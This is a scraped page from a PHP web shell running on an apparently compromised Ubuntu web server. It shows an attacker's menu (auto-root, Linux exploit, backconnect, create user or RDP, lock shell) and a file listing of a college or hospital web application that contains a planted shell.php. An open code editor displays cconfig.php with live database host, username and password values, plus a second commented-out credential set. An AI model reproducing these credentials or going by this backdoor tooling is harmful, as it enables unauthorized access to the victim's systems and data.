Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.15.228.134
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
misc /
public_html /
live100 /
[ HOME SHELL ]
Name
Size
Permission
Action
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
PrintDocSample
[ DIR ]
drwxr-xr-x
bkp
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fpdf_alpha
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-ui-1.11.4
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
popup
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
textreports
[ DIR ]
drwxr-xr-x
MainPage.html
9.56
KB
-rwxr-xr-x
Thumbs.db
81
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.13
KB
-rwxr-xr-x
collegeInfoPopup.html
3.95
KB
-rwxr-xr-x
demo.html
7.06
KB
-rwxr-xr-x
file.jpg
19.5
KB
-rwxr-xr-x
filedownload.php
963
B
-rwxr-xr-x
ftptest.php
800
B
-rwxr-xr-x
homepage.html
1.19
KB
-rwxr-xr-x
hospital.png
190.97
KB
-rwxr-xr-x
index.html
4.41
KB
-rwxr-xr-x
indexcolldemo.html
3.94
KB
-rwxr-xr-x
indexdemo.html
3.92
KB
-rwxr-xr-x
indexlogin.html
4.41
KB
-rwxr-xr-x
printpreview.html
5.63
KB
-rwxr-xr-x
resetPasswordOTP.html
2.03
KB
-rwxr-xr-x
resetPasswordPopup.html
1.79
KB
-rwxr-xr-x
sales.html
7.08
KB
-rwxr-xr-x
serverlocal.php
387
B
-rwxr-xr-x
shell.php
1.08
KB
-rwxr-xr-x
spinner_bar.gif
1.81
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig.php
<?php define("APP_NAME_G","development"); define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); define("INR_NAME_PICFORMAT", "xx,xx,xx,xxx.xx"); //define("APP_HOST", "http://10.10.200.172/activity/"); //define("APP_HOST", "http://localhost/activity/"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "72.167.46.92"; #hostname can include port as well $this->mstr_user = "ihmsuser"; $this->mstr_password = "ihms@124"; $this->mstr_db = "ihms"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); /* $this->mstr_host = "localhost"; #hostname can include port as well $this->mstr_user = "resultsg_tarka"; $this->mstr_password = "tarka123"; $this->mstr_db = "resultsg_rcu"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); */ } } ?>
Close